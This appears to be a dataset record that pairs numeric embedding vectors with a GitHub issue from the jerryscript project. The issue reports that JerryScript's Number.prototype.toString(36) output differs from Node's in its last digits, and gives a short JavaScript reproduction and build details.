0.0034940314944833517, -0.006375194992870092, 0.0013952158624306321, 0.010230441577732563, 0.011011078022420406, 0.004745445679873228, -0.00185229885391891, 0.015338814817368984, -0.01070977933704853, 0.0019961001817137003, -0.014900563284754753, -0.0025302197318524122, 0.0165850929915905, 0.005015929229557514, -0.008867752738296986, -0.01877635344862938, 0.01209301222115755, -0.014037754386663437, 0.02041979692876339, 0.002971895271912217, 0.011113792657852173, -0.010045554488897324, 0.007217460311949253, -0.011216508224606514, 0.02178933471441269, -0.011510958895087242, -0.026336196810007095, -0.0024925575125962496, 0.013852867297828197, -0.0031396637205034494, 0.007313327863812447, -0.016502920538187027, -0.0066217114217579365, -0.007785818073898554, 0.006895618978887796, -0.015968801453709602, 0.000927861372474581, 0.0024617428425699472, 0.02303561381995678, 0.01862570457160473, -0.013140708208084106, -0.024446235969662666, -0.015489463694393635, 0.0006774928770028055, 0.004834465682506561, 0.008984163403511047, 0.00031798938289284706, 0.008710255846381187, 0.007813208736479282, -0.0032851770520210266, -0.00027390741161070764, 0.00203547440469265, 0.0035813392605632544, -0.008436348289251328, -0.002769888611510396, -0.004382518585771322, 0.0016074940795078874, 0.010025011375546455, 0.014708828181028366, -0.048152923583984375, -0.010470110923051834, 0.012510720640420914, -0.004372247029095888, -0.028349416330456734, 0.011271289549767971, -0.0027681768406182528, -0.009244374930858612, -0.004091491922736168, -0.006388890091329813, -0.0267744492739439, -0.020953916013240814, 0.008196678943932056, 0.01001131534576416, 0.015955107286572456, -0.0043790945783257484, 0.002184411510825157, 0.0016605636337772012, -0.027828993275761604, 0.016817914322018623, -0.014763609506189823, 0.0028092628344893456, -0.018598312512040138, -0.008333632722496986, 0.03760748729109764, -0.03536144644021988, -0.029198529198765755, -0.034704070538282394, 0.011415091343224049, 0.028349416330456734, -0.0024069612845778465, -0.0051391879096627235, -0.03319757804274559, -0.005334347020834684, -0.02276170626282692, 0.009470348246395588, -0.008915686048567295, 0.002728802617639303, -0.000927861372474581, -0.003944266587495804, 0.013229727745056152, 0.008614388294517994, -0.012305290438234806, 0.01040848158299923, 0.032759327441453934, -0.012455939315259457, -0.03322497010231018, 0.018913306295871735, -0.02535013109445572, -0.020241757854819298, -0.005621949676424265, -0.0034615048207342625, -0.014017211273312569, -0.0069298576563596725, -0.0016460123006254435, -0.0234327781945467, -0.01937894895672798, -0.005854771006852388, 0.011778018437325954, 0.011141183786094189, 0.04256521165370941, -0.003711445489898324, 0.02821246348321438, -0.004707783460617065, 0.025966422632336617, -0.0063169896602630615, -0.003646392375230789, -0.014790999703109264, -0.009792190045118332, 0.0038483990356326103, 0.0006205714889802039, 0.005543201230466366, -0.0041428497061133385, 0.024144938215613365, -0.013613197952508926, 0.010333157144486904, -0.022980831563472748, -0.006340956315398216, -0.02391211688518524, 0.004406485240906477, 0.025445997714996338, -0.003752531483769417, -0.0066217114217579365, 0.0068511092104017735, -0.006501877214759588, -0.002441199729219079, -0.022597361356019974, -0.010250984691083431, -0.00384497526101768, -0.022268671542406082, -0.029664171859622, 0.008723950944840908, 0.02020067162811756, 0.00016081360809039325, -0.014017211273312569, -0.004896095022559166, 0.01551685482263565, 0.007046268321573734, -0.008600692264735699, 0.025459693744778633, -0.008367870934307575, 0.0065087247639894485, 0.00152874574996531, 0.027130529284477234, 0.013976125977933407, -0.0038689421489834785, -0.019241996109485626, 0.001319891307502985, -0.0264731515198946, -0.000028353697416605428, 0.007313327863812447, -0.019488511607050896, -0.013024297542870045, -0.013291357085108757, -0.0021981068421155214, -0.006039658561348915, 0.012722998857498169, 0.006008843891322613, -0.017215080559253693, 0.006700459867715836, -0.010565978474915028, 0.006378619000315666, 0.007826903834939003, -0.009080030955374241, 0.0039819288067519665, 0.02595272660255432, -0.0061800358816981316, -0.0024908455088734627, 0.013989821076393127, 0.003694326151162386, 0.006416281219571829, 0.00038903410313650966, -0.033334530889987946, 0.03695010766386986, -0.02203585021197796, 0.027924859896302223, -0.009203288704156876, -0.0013969277497380972, 0.0021416135132312775, 0.02196737378835678, 0.01974872499704361, -0.01268876064568758, 0.00782005675137043, -0.0208443533629179, -0.004536591470241547, 0.007600930519402027, -0.01153150200843811, -0.006419704761356115, 0.0018334677442908287, -0.005149459466338158, 0.014626655727624893, -0.006594320759177208, -0.005214512348175049, -0.0064539434388279915, 0.0012308714212849736, 0.015544245019555092, -0.011743780225515366, 0.022624751552939415, -0.014845781959593296, 0.000855960650369525, 0.0011341478675603867, -0.012750389985740185, -0.003927147481590509, 0.003615577705204487, -0.023597123101353645, -0.031992387026548386, 0.017215080559253693, 0.0111069455742836, -0.0026329350657761097, -0.001917351852171123, -0.0026860046200454235, 0.020406102761626244, -0.008970467373728752, 0.004673545248806477, 0.00955252069979906, -0.008792427368462086, -0.002778448164463043, 0.004166816361248493, 0.0050707110203802586, -0.0023453321773558855, 0.010928905569016933, -0.02141955867409706, -0.002901706611737609, -0.008319937624037266, -0.013352986425161362, -0.023268435150384903, 0.010853581130504608, -0.011250746436417103, 0.027555085718631744, -0.03297845274209976, -0.023953203111886978, -0.011264442466199398, -0.003814160590991378, 0.011360310018062592, 0.035224493592977524, -0.04782423377037048, 0.002302534179762006, -0.013551568612456322, 0.014024059288203716, 0.028322026133537292, 0.012592893093824387, 0.006652526091784239, -0.0106481509283185, -0.011305528692901134, -0.0004844737413804978, -0.0014071993064135313, -0.0343753807246685, 0.003999048378318548, 0.0075187585316598415, 0.0023316368460655212, 0.009182745590806007, 0.015462073497474194, -0.02074848674237728, -0.005022777244448662, 0.011332918889820576, 0.002420656615868211, -0.018338100984692574, 0.017598550766706467, 0.01805049739778042, -0.013106469064950943, 0.0009971942054107785, 0.00411545904353261, -0.0022186499554663897, 0.01710551790893078, 0.011757475323975086, 0.016105756163597107, 0.001987540628761053, -0.007477672304958105, -0.00022147981508169323, 0.012668217532336712, -0.01109325047582388, -0.010627607814967632, -0.009038944728672504, 0.040702641010284424, 0.0076557123102247715, -0.000011033867849619128, 0.010168812237679958, 0.017201384529471397, -0.020912829786539078, 0.018420273438096046, 0.0030711868312209845, 0.02361081913113594, -0.014161013066768646, 0.006275903433561325, -0.04114089161157608, -0.017886154353618622, 0.0023915539495646954, 0.0017316084122285247, 0.018297014757990837, -0.0261718537658453, 0.004642730578780174, -0.006409433204680681, 0.003838127478957176, -0.029445046558976173, 0.007443433627486229, 0.0025969846174120903, 0.005758903454989195, 0.013051687739789486, 0.025363825261592865, 0.011237051337957382, 0.008984163403511047, 0.012051925994455814, -0.023076700046658516, 0.0020594412926584482, 0.025966422632336617, 0.0036600877065211535, -0.0010793664259836078, -0.012051925994455814, -0.017078127712011337, 0.006844261195510626, 0.006823718547821045, -0.002174139954149723, -0.00554662523791194, -0.0015261778607964516, -0.0010168812004849315, 0.0261718537658453, 0.0015492887469008565, 0.014284271746873856, -0.02587055414915085, 0.005526082124561071, -0.011038468219339848, 0.008874599821865559, -0.0019704215228557587, -0.003021541051566601, -0.01507860329002142, -0.01101792510598898, -0.026363588869571686, -0.01151780690997839, -0.01081934291869402, -0.007635169196873903, 0.007484519854187965, -0.012449091300368309, -0.019036564975976944, 0.016653571277856827, -0.007306480314582586, -0.0006539539317600429, -0.03434798866510391, -0.02854115143418312, 0.008586997166275978, 0.002509676618501544, 0.008436348289251328, -0.006471062544733286, -0.000230681398534216, 0.02495296485722065, -0.002905130386352539, -0.009032096713781357, 0.007285937201231718, -0.0038757899310439825, -0.0058958567678928375, 0.016927476972341537, -0.001254838309250772, 0.014284271746873856, 0.010812494903802872, -0.0251036137342453, 0.009853819385170937, 0.017119213938713074, 0.01783137209713459, 0.01813266985118389, -0.004844737239181995, -0.022802792489528656, 0.009285461157560349, 0.013428310863673687, 0.004067524801939726, -0.0043893661350011826, -0.010381090454757214, 0.008648626506328583, -0.003653240157291293, 0.003292024601250887, 0.009778494946658611, -0.01743420585989952, 0.002828093944117427, -0.01001131534576416, -0.0040504056960344315, -0.018639398738741875, 0.003824432147666812, -0.026884011924266815, 0.02029653824865818, 0.010593368671834469, -0.0013395784189924598, -0.006423128768801689, -0.00016980119107756764, -0.0009329970926046371, 0.013791237957775593, 0.0032594981603324413, -0.010346852242946625, 0.0002552902733441442, -0.02485709823668003, -0.0021638686303049326, 0.016598789021372795, 0.017297253012657166, 0.013613197952508926, 0.000896190817002207, 0.007087354082614183, -0.0057725985534489155, -0.005039896350353956, 0.012284747324883938, -0.00755299674347043, 0.03130761533975601, 0.013606350868940353, -0.007169526536017656, 0.00027904316084459424, 0.013106469064950943, -0.007813208736479282, -0.03327975049614906, 0.005830803886055946, -0.0062245456501841545, -0.0019704215228557587, 0.009018401615321636, -0.008237765170633793, -0.011997144669294357, 0.01352417841553688, -0.01600988768041134, -0.0038586705923080444, 0.021296301856637, 0.002894858829677105, 0.013154403306543827, 0.009374480694532394, 0.00896362029016018, 0.028623323887586594, 0.0065908972173929214, 0.004848161246627569, -0.004338008817285299, -0.006043082103133202, 0.025336435064673424, 0.009792190045118332, 0.0052076647989451885, 0.011490415781736374, -0.0033108557108789682, 0.006327261216938496, -0.022131718695163727, 0.016133146360516548, -0.009271766059100628, -0.015037517063319683, -0.003492319490760565, -0.018666790798306465, -0.004464690573513508, -0.0013352986425161362, 0.003975081257522106, 0.02428189106285572, -0.0055808634497225285, 0.01294897310435772, 0.017023345455527306, -0.0076831029728055, 0.00801863893866539, 0.005231631454080343, -0.0019533021841198206, 0.01716029830276966, -0.019214604049921036, 0.0038689421489834785, -0.014065145514905453, -0.013496787287294865, 0.012188879773020744, -0.015023821033537388, 0.017913544550538063, 0.03229368478059769, 0.010702932253479958, 0.01573598012328148, -0.007888533174991608, 0.01410623174160719, 0.005851346999406815, 0.007505062967538834, -0.005269293673336506, -0.0031225443817675114, 0.014517093077301979, 0.012175184674561024, -0.007327022962272167, 0.010504349134862423, 0.02985590696334839, -0.010196203365921974, -0.019488511607050896, 0.017886154353618622, 0.02102239429950714, 0.013311900198459625, 0.016502920538187027, -0.0008161584846675396, 0.0196254663169384, 0.005057015456259251, 0.011456177569925785, -0.002049169735983014, -0.007066810969263315, -0.014147317968308926, 0.014215794391930103, -0.007915924303233624, -0.01095629669725895, 0.00099462631624192, -0.03484102338552475, -0.0033896041568368673, -0.0011367157567292452, -0.009888057596981525, 0.009579911828041077, -0.00203889817930758, -0.007943314500153065, -0.009175898507237434, 0.00006403655424946919, 0.000047666308091720566, 0.022693227976560593, -0.005892433226108551, -0.008949924260377884, -0.003814160590991378, -0.009347090497612953, 0.024364063516259193, 0.002119358628988266, -0.018639398738741875, 0.011038468219339848, 0.014640350826084614, 0.01676313392817974, 0.007785818073898554, -0.0028640443924814463, -0.014147317968308926, 0.002855484839528799, -0.005758903454989195, -0.0028845875058323145, 0.005779446102678776, -0.01847505383193493, -0.011278137564659119, 0.013017449527978897, -0.01425688061863184, 0.002889723051339388, -0.008539063856005669, -0.017667027190327644, -0.002989014610648155, -0.003834703704342246, -0.004964571911841631, 0.000870083982590586, -0.025117309764027596, -0.004834465682506561, 0.009620998054742813, -0.00421475013718009, 0.00016006463556550443, -0.018310710787773132, -0.014147317968308926, 0.004033286590129137, -0.016119450330734253, 0.012722998857498169, -0.010360547341406345, -0.013291357085108757, 0.0032834650482982397, 0.008751342073082924, 0.009353937581181526, -0.007600930519402027, 0.009559368714690208, 0.00938817672431469, -0.02087174542248249, 0.008052878081798553, -0.018598312512040138, 0.0010733746457844973, -0.015968801453709602, -0.031663697212934494, 0.007813208736479282, 0.017324643209576607, -0.014927953481674194, -0.015256642363965511, 0.017050735652446747, -0.004235293250530958, -0.00921698473393917, 0.0021416135132312775, 0.0021638686303049326, 0.0032543623819947243, -0.01413362193852663, 0.013955582864582539, -0.007053115870803595, -0.0005704977666027844, -0.004201055038720369, 0.0011153167579323053, 0.014051450416445732, 0.02333691157400608, 0.005478148348629475, -0.0013926479732617736, 0.0008041750406846404, 0.006563506089150906, -0.005033048801124096, 0.021077174693346024, -0.016872696578502655, 0.009840123355388641, 0.01069608423858881, 0.00527271768078208, 0.009703169576823711, 0.016694657504558563, -0.018338100984692574, -0.017762895673513412, 0.007224307861179113, 0.013681675307452679, 0.010620759800076485, -0.00740234786644578, 0.007525606080889702, -0.013784389942884445, 0.010264679789543152, 0.006566930096596479, 0.02595272660255432, -0.009908600710332394, -0.013599502854049206, 0.002242616843432188, 0.008949924260377884, 0.005101525690406561, 0.014366443268954754, 0.013332443311810493, -0.006734698545187712, -0.010415329597890377, -0.002372722839936614, 0.015311424620449543, -0.008066573180258274, -0.020104803144931793, -0.03259498253464699, 0.00824461318552494, -0.012442244216799736, -0.010257832705974579, -0.03158152475953102, 0.039908308535814285, 0.00938817672431469, -0.006395738106220961, -0.0011709542013704777, -0.005269293673336506, -0.0027887197211384773, 0.02099500223994255, 0.017625940963625908, -0.026418369263410568, 0.004272955469787121, -0.038785289973020554, -0.016667265444993973, 0.018214842304587364, 0.02096761204302311, -0.003632697043940425, 0.0035471010487526655, -0.013428310863673687, -0.00384155148640275, -0.010387938469648361, -0.013133860193192959, 0.012168336659669876, -0.0024292164016515017, 0.003769650822505355, 0.01507860329002142, 0.013777542859315872, -0.0225151889026165, -0.012051925994455814, 0.006556658539921045, 0.018310710787773132, 0.0007356982096098363, -0.015037517063319683, -0.0023658752907067537, 0.028650714084506035, -0.00009517212311038747, 0.015544245019555092, -0.006416281219571829, -0.006659374106675386, 0.02239193022251129, 0.018844829872250557, 0.010244136676192284, -0.0105728255584836, -0.01070977933704853, -0.01616053655743599, -0.0015655520837754011, 0.007628321181982756, -0.019283082336187363, 0.010490654036402702, 0.013750151731073856, -0.002990726614370942, 0.011038468219339848, -0.007696798071265221, 0.018844829872250557, -0.004290074575692415, 0.017721809446811676, -0.026308806613087654, -0.011298680678009987, -0.006272479891777039, 0.0055363536812365055, -0.014777304604649544, 0.0015527126379311085, 0.02157020755112171, 0.024227110669016838, -0.028869841247797012, 0.007224307861179113, 0.012531263753771782, 0.024747533723711967, -0.014886867254972458, -0.028157681226730347, 0.0008371295407414436, -0.01663987524807453, -0.011504110880196095, 0.0024600308388471603, -0.005769175011664629, -0.010305766016244888, -0.024774925783276558, 0.008450043387711048, -0.0033793326001614332, -0.020680008456110954, -0.0016716911923140287, 0.015489463694393635, 0.02315887063741684, 0.016530312597751617, 0.0006376907113008201, -0.018392883241176605, 0.00958675891160965, 0.005710969679057598, -0.007484519854187965, -0.006549810990691185, -0.022816486656665802, -0.0006513860425911844, 0.006693612318485975, 0.01042217668145895, 0.014297966845333576, -0.006306718103587627, 0.0007964713731780648, -0.001850586966611445, -0.006200578995049, 0.013606350868940353, 0.010216746479272842, 0.0028982828371226788, -0.01370906550437212, 0.012901038862764835, -0.0023436201736330986, -0.01785876229405403, -0.003292024601250887, -0.004153121262788773, 0.010778256691992283, 0.027335958555340767, -0.020899135619401932, 0.028034422546625137, 0.03160891681909561, 0.0017547192983329296, 0.015352509915828705, 0.008182983845472336, -0.010531740263104439, -0.0022802792955189943, 0.003769650822505355, 0.005146035458892584, 0.004094915930181742, 0.017762895673513412, 0.0011444194242358208, -0.03319757804274559, 0.019529597833752632, 0.0019396068528294563, 0.024802315980196, 0.015872934833168983, 0.025240568444132805, -0.009853819385170937, -0.0023299248423427343, -0.009764798916876316, 0.030650239437818527, 0.0001385586365358904, 0.009278613142669201, -0.009764798916876316, -0.01725616678595543, 0.00999762024730444, 0.04516733065247536, -0.011812256649136543, -0.01355841662734747, 0.007799513638019562, 0.005348042119294405, -0.0007570972084067762, -0.03404669091105461, 0.011483567766845226, 0.015749676153063774, 0.010415329597890377, -0.0006629415438510478, -0.015434682369232178, 0.0065772016532719135, 0.00952513050287962, 0.019543293863534927, 0.002386418404057622, -0.0023487559519708157, 0.010292070917785168, 0.004190783482044935, -0.018283318728208542, -0.0011683863122016191, -0.005063863005489111, -0.005577439442276955, 0.006008843891322613, -0.001593798748217523, -0.0029239614959806204, 0.0003886061313096434, -0.002759617054834962, -0.006871652323752642, 0.0049919625744223595, -0.026705972850322723, 0.0011221644235774875, -0.018173756077885628, 0.0059335194528102875, 0.0011341478675603867, -0.015010125935077667, -0.024487322196364403, -0.0017350321868434548, -0.012038230895996094, 0.012202574871480465, -0.022227585315704346, 0.007162678521126509, -0.007737884297966957, -0.000027203499485040084, 0.0005401111557148397, -0.007114744745194912, -0.015599027276039124, -0.006094439886510372, 0.014503397047519684, 0.001151267089881003, 0.0007541013183072209, 0.007368109188973904, -0.022145414724946022, 0.018612008541822433, 0.015626417472958565, -0.0038483990356326103, 0.006566930096596479, -0.004961147904396057, 0.028157681226730347, -0.006679916754364967, 0.014215794391930103, 0.02823985368013382, -0.00755299674347043, 0.01785876229405403, 0.012099860236048698, -0.011524653993546963, -0.0007001758203841746, -0.0013489939738065004, 0.020063716918230057, 0.0006997478194534779, 0.00499881012365222, 0.004324313253164291, 0.004567406140267849, -0.004735174123197794, 0.011305528692901134, -0.021351082250475883, 0.010771408677101135, 0.015434682369232178, 0.014722523279488087, 0.008614388294517994, -0.001727328635752201, -0.006529267877340317, 0.011367157101631165, 0.01051119714975357, 0.002509676618501544, 0.004940604791045189, -0.0012394309742376208, -0.005204240791499615, 0.001778686186298728, 0.00815559271723032, -0.015434682369232178, -0.0037456839345395565, -0.027609866112470627, -0.002718531060963869, 0.021597599610686302, -0.00013096198381390423, -0.0041188825853168964, 0.007368109188973904, 0.021748248487710953, -0.028869841247797012, 0.004646154586225748, 0.003752531483769417, 0.00013684670557267964, 0.005395975895226002, -0.00902524869889021, 0.007217460311949253, 0.005293260794132948, -0.0030181172769516706, 0.01440752949565649, -0.024117548018693924, 0.013948734849691391, 0.0026380708441138268, -0.002588425064459443, 0.01509229838848114, -0.010360547341406345, -0.007080506533384323, -0.00185229885391891, -0.052261535078287125, -0.0076831029728055, 0.0032167001627385616, 0.0029975741636008024, 0.0156675036996603, 0.008121354505419731, -0.006563506089150906, -0.009607302024960518, -0.012250509113073349, 0.006347804330289364, -0.0025387792848050594, 0.01935155875980854, -0.017324643209576607, -0.0020029479637742043, 0.02248779870569706, -0.012620284222066402, -0.014790999703109264, 0.04464690759778023, 0.0038038890343159437, 0.010935753583908081, 0.01883113384246826, -0.0005752055440098047, 0.008135049603879452, 0.0034255546052008867, -0.004136001691222191, -0.013140708208084106, 0.01537990104407072, -0.011284985579550266, -0.012031382881104946, 0.03264976292848587, -0.0042113265953958035, -0.02276170626282692, -0.0017025057459250093, 0.00047035038005560637, 0.010353700257837772, -0.0191735178232193, -0.01600988768041134, -0.015982497483491898, -0.0014320221962407231, 0.039963092654943466, -0.02285757288336754, -0.028349416330456734, 0.001056255423463881, -0.009141659364104271, -0.021981069818139076, 0.01965285651385784, -0.0241860244423151, 0.010127726010978222, -0.00921698473393917, -0.020132195204496384, -0.007039420306682587, 0.0053309230133891106, -0.004009319469332695, -0.009347090497612953, -0.0005811972660012543, -0.004365399479866028, -0.011757475323975086, 0.0012205998646095395, 0.027582475915551186, -0.00606362521648407, 0.004112035036087036, 0.0211456511169672, -0.0007541013183072209, -0.002232345286756754, 0.002901706611737609, 0.00870340783149004, -0.015831848606467247, -0.018201148137450218, 0.0106481509283185, -0.005091254133731127, 0.0179546307772398, 0.007724188733845949, -0.001093061757273972, 0.0040504056960344315, -0.008217222057282925, -0.010230441577732563, -0.022405626252293587, -0.014462310820817947, -0.030075034126639366, -0.005484995897859335, 0.013914496637880802, -0.01281201932579279, -0.012421701103448868, 0.02355603687465191, 0.017598550766706467, -0.00926491804420948, 0.006289598997682333, 0.004748869687318802, -0.01883113384246826, -0.009121117182075977, 0.00007430808182107285, -0.020433492958545685, -0.024966660887002945, 0.008182983845472336, -0.0005054447683505714, -0.008614388294517994, -0.010025011375546455, -0.024090155959129333, -0.0119423633441329, -0.0009030384826473892, -0.004149697255343199, -0.0029325212817639112, -0.008456891402602196, -0.02361081913113594, -0.022652143612504005, 0.008182983845472336, 0.029965471476316452, 0.01673574186861515, 0.011524653993546963, -0.020091108977794647, -0.004557134583592415, -0.011202813126146793, 0.00031734741060063243, -0.0008422652608714998, -0.0000030326418709591962, -0.0026277992874383926, -0.007025725208222866, 0.00019558701023925096, 0.018707875162363052, -0.025459693744778633, 0.015434682369232178, 0.016626179218292236, -0.020310234278440475, 0.00755299674347043, 0.011675302870571613, -0.012955820187926292, -0.00926491804420948, 0.015270338393747807, -0.008319937624037266, -0.0019584379624575377, 0.009395023807883263, 0.017790285870432854, 0.0021518850699067116, 0.012784628197550774, 0.025309044867753983, -0.009668931365013123, -0.005882161669433117, -0.012113555334508419, -0.00518712168559432, 0.04174349084496498, 0.008299394510686398, 0.004916638135910034, 0.0034837599378079176, 0.010216746479272842, 0.017612246796488762, -0.007053115870803595, 0.012469634413719177, -0.009223831817507744, -0.0251036137342453, -0.0032612101640552282, 0.012421701103448868, 0.020406102761626244, -0.004824194125831127, -0.026760753244161606, 0.005741783883422613, 0.007785818073898554, 0.012517568655312061, -0.020378710702061653, 0.04552341252565384, -0.01283940952271223, 0.0025541866198182106, -0.0072585465386509895, -0.002977031050249934, -0.021761944517493248, -0.004851584788411856, -0.00448865769430995, -0.007614626083523035, 0.03245802968740463, 0.006902466528117657, 0.020734790712594986, 0.004796803463250399, 0.00310371327213943, 0.03015720658004284, 0.01576337218284607, 0.006073896773159504, -0.011825952678918839, -0.01351048331707716, -0.0025233719497919083, 0.004796803463250399, 0.003838127478957176, -0.002384706400334835, -0.00249940506182611, 0.011524653993546963, 0.005265870131552219, -0.0016049261903390288, 0.014763609506189823, 0.015037517063319683, 0.0028298059478402138, -0.0021672924049198627, -0.0020080837421119213, -0.006532691884785891, 0.0045947968028485775, 0.014873172156512737, -0.0010793664259836078, -0.003910028375685215, 0.012764085084199905, -0.0005225639906711876, 0.01115487888455391, 0.0067586652003228664, -0.019091347232460976, -0.0003192733274772763, 0.01014826912432909, -0.000986066646873951, -0.011100097559392452, -0.02126890979707241, -0.0024959812872111797, 0.004512624349445105, 0.02017328143119812, -0.010744018480181694, 0.010312614031136036, -0.004276379477232695, -0.010579673573374748, 0.023419084027409554, 0.029253311455249786, 0.01564011350274086, 0.015160774812102318, -0.010922057554125786, -0.0001553568581584841, -0.025665124878287315, -0.01023728959262371, 0.00005660039823851548 ]
1,723
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
There seems to be a rounding issue in num.toString(36) tostring.js ```javascript var num = 0.7160471805175876 if (!this.print) var print = console.log print(num.toString(), num.toString(36)) ``` ```sh $ jerry tostring.js 0.7160471805175876 0.przwauak3o $ node tostring.js 0.7160471805175876 0.przwauak3nm ``` "Arch Linux" (Linux 5.13.10-arch1-1 x86_64) build: tools/build.py --clean --debug commit: 3bcd48f72d4af01d1304b754ef19fe1a02c96049
Number.prototype.toString(36) presicion
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4739/comments
0
2021-08-19T09:38:32
2021-12-03T11:58:37Z
https://github.com/jerryscript-project/jerryscript/issues/4739
974,470,955
4,739
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Number.prototype.toString(36) presicion Issue date: --- start body --- There seems to be a rounding issue in num.toString(36) tostring.js ```javascript var num = 0.7160471805175876 if (!this.print) var print = console.log print(num.toString(), num.toString(36)) ``` ```sh $ jerry tostring.js 0.7160471805175876 0.przwauak3o $ node tostring.js 0.7160471805175876 0.przwauak3nm ``` "Arch Linux" (Linux 5.13.10-arch1-1 x86_64) build: tools/build.py --clean --debug commit: 3bcd48f72d4af01d1304b754ef19fe1a02c96049 --- end body ---
628
[ -0.0002516975800972432, -0.007701479364186525, -0.004061088431626558, -0.005621740594506264, 0.03566429764032364, 0.0163936335593462, 0.0042069754563272, 0.06590023636817932, -0.053957853466272354, 0.02416975237429142, -0.021794848144054413, 0.02985595539212227, -0.004817665554583073, 0.02302979864180088, 0.03153874725103378, 0.029557395726442337, -0.00948605127632618, 0.0046039242297410965, -0.0059236930683255196, 0.013781237415969372, -0.023749055340886116, 0.026327524334192276, -0.019609933719038963, 0.025228282436728477, -0.016977181658148766, 0.007402919698506594, 0.005533529911190271, -0.014168008230626583, 0.00040288575110025704, 0.005720129702240229, 0.003134875325486064, 0.027481049299240112, -0.02757604606449604, 0.0081968167796731, 0.02469901740550995, -0.011684535071253777, 0.023043369874358177, 0.0502665713429451, -0.013292686082422733, -0.03295011818408966, -0.03580000624060631, 0.0012739672092720866, -0.02779318019747734, 0.07914542406797409, -0.0179271437227726, 0.025838973000645638, 0.04812237247824669, 0.01686861552298069, 0.008970357477664948, -0.028091739863157272, -0.0074164909310638905, -0.0393284372985363, 0.01532153319567442, -0.03436148911714554, 0.01578294299542904, -0.027589617297053337, 0.03740137070417404, 0.018252845853567123, 0.02346406690776348, -0.013441965915262699, 0.03159302845597267, 0.0027786395512521267, -0.0008719296311028302, 0.02416975237429142, 0.01055136602371931, 0.03645140677690506, -0.015579380095005035, 0.026761792600154877, 0.025336850434541702, 0.02460402250289917, -0.003038182854652405, 0.008210388012230396, 0.05219363793730736, 0.051162250339984894, 0.004695527721196413, 0.006351176183670759, 0.010089956223964691, 0.010252806358039379, -0.004946589004248381, 0.009336771443486214, 0.0004045821260660887, 0.04348112642765045, 0.0003257013449911028, -0.019067099317908287, -0.005150152370333672, 0.027956031262874603, -0.022364825010299683, -0.04025125503540039, 0.0027769431471824646, 0.02263624221086502, -0.00945890974253416, 0.06443458050489426, -0.02714177779853344, -0.024617591872811317, -0.01796785742044449, 0.03007308952510357, -0.056834883987903595, -0.0022697311360388994, -0.038134198635816574, 0.03338438645005226, 0.017682868987321854, 0.008162889629602432, -0.004987301770597696, 0.024278320372104645, 0.03153874725103378, 0.015280821360647678, 0.023844052106142044, -0.010829569771885872, 0.018673542886972427, 0.053252167999744415, 0.023694772273302078, -0.01897210255265236, -0.030480217188596725, 0.010056029073894024, -0.03623427450656891, 0.014018728397786617, 0.024807585403323174, -0.021835559979081154, 0.011793102137744427, 0.022880518808960915, -0.03965413570404053, 0.0004414779832586646, -0.020030632615089417, -0.007009364198893309, -0.03750993683934212, 0.01151489932090044, -0.006622593849897385, -0.0004754051915369928, 0.003769314382225275, -0.02049204148352146, -0.05197650566697121, 0.020003490149974823, 0.006727768108248711, 0.003636998124420643, 0.020736318081617355, -0.011569182388484478, 0.009608189575374126, 0.01695004105567932, -0.025065431371331215, -0.03392722085118294, -0.006147612817585468, -0.0436982624232769, 0.060689013451337814, -0.02027490735054016, -0.03311296924948692, 0.0033112969249486923, -0.015592951327562332, 0.02653108723461628, -0.027956031262874603, -0.003725209040567279, -0.004949981812387705, -0.025676121935248375, 0.02277195081114769, 0.01217308733612299, -0.010015316307544708, -0.014371571131050587, -0.001557259471155703, 0.04698241874575615, 0.003575929207727313, -0.06014617905020714, -0.026544658467173576, -0.010191737674176693, 0.030181657522916794, -0.02115701511502266, -0.012675209902226925, 0.01608150266110897, 0.02631395310163498, 0.02980167232453823, 0.011182412505149841, 0.02184913121163845, -0.014697272330522537, 0.03645140677690506, 0.015891510993242264, 0.026191815733909607, -0.02127915434539318, -0.010836354456841946, -0.0024563309270888567, -0.0022188404109328985, -0.0025699869729578495, -0.023287644609808922, -0.012756635434925556, -0.008128962479531765, 0.005336752161383629, -0.0380256325006485, 0.010123883374035358, -0.03444291651248932, 0.004054303281009197, -0.006171361543238163, -0.01992206461727619, -0.02176770567893982, -0.013075551018118858, 0.011935596354305744, 0.0133266132324934, -0.020003490149974823, 0.033058684319257736, 0.003765921574085951, 0.0002690852852538228, -0.035121459513902664, -0.005017836112529039, -0.008970357477664948, 0.010449584573507309, -0.026381807401776314, -0.016190070658922195, -0.04068552330136299, -0.0013358843280002475, -0.031620170921087265, -0.006273143459111452, 0.005553886294364929, 0.0013553925091400743, 0.04285686835646629, 0.00836645346134901, -0.009343557059764862, 0.010022101923823357, 0.0008744741789996624, -0.02403404377400875, 0.004532677121460438, 0.008814292028546333, -0.00036492967046797276, 0.015158683061599731, -0.008637870661914349, 0.02159128338098526, -0.03438863158226013, -0.022052694112062454, -0.006446172017604113, -0.015158683061599731, -0.017058607190847397, -0.016203641891479492, 0.030561642721295357, -0.021645568311214447, -0.010524224489927292, 0.021347008645534515, -0.006303677801042795, -0.03246156498789787, 0.04453965649008751, 0.02495686523616314, -0.00039843280683271587, -0.015592951327562332, 0.006106900051236153, -0.02351834997534752, 0.043019719421863556, -0.01643434725701809, -0.004190011881291866, -0.007022934965789318, -0.036424264311790466, -0.03064306639134884, -0.03164731338620186, -0.000703565776348114, -0.018782110884785652, -0.02088559791445732, 0.025811830535531044, -0.0075454143807291985, -0.016719335690140724, 0.0035521802492439747, -0.016027219593524933, -0.036424264311790466, -0.020532755181193352, 0.009506408125162125, 0.04223260655999184, 0.019433513283729553, -0.020342761650681496, -0.0020169734489172697, 0.03001880645751953, -0.06079758331179619, 0.003898237831890583, 0.022717667743563652, 0.02273123897612095, -0.06443458050489426, -0.013190903700888157, -0.007050076965242624, 0.02184913121163845, 0.028118882328271866, -0.02871600165963173, -0.002190002240240574, 0.017669297754764557, -0.03403579071164131, -0.004329113755375147, -0.015674376860260963, -0.0004902483779005706, -0.003694674465805292, -0.019596364349126816, -0.0018982280744239688, 0.05623776465654373, 0.01936565898358822, 0.0362614169716835, 0.0012985644862055779, 0.02259553037583828, 0.020383475348353386, -0.003966092132031918, -0.024794014170765877, -0.03178302198648453, -0.004515713080763817, -0.04361683875322342, -0.01861925981938839, 0.019202807918190956, -0.017777863889932632, -0.01582365669310093, -0.012308795936405659, -0.015050115995109081, 0.023803338408470154, 0.025553984567523003, -0.02092631161212921, -0.045163918286561966, -0.018958531320095062, -0.032895833253860474, -0.002040722407400608, 0.005933871027082205, 0.007457203231751919, -0.003942343406379223, -0.02359977550804615, 0.018103566020727158, 0.052817899733781815, 